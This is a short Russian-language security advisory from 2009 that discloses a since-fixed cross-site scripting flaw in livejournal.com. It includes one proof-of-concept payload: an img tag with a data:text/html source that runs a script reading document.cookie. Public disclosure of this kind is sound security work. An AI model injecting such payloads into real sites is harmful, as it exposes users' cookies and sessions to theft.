DSECRG-09-046

Вендор

Livejournal

Продукт

livejournal.com 

Тип уязвимости

Уязвимость межсайтового скриптинга

Reported

07.07.2009

Date of Public Advisory

12.08.2009

Автор

Алексей Трошичев

Детальное описание

JavaScript может быть внедрён в ссылку через определения src в <img src=> тэге как data:text/html. 

Пример 
*********
<img src=data:text/html,<html>%0D%0A<body>%0D%0A<script>alert(document.cookie)%3B<%2Fscript>%0D%0A<body>%0D%0A<html>%0D%0A>

Решение 
**********
Данная уязвимость была закрыта производителем.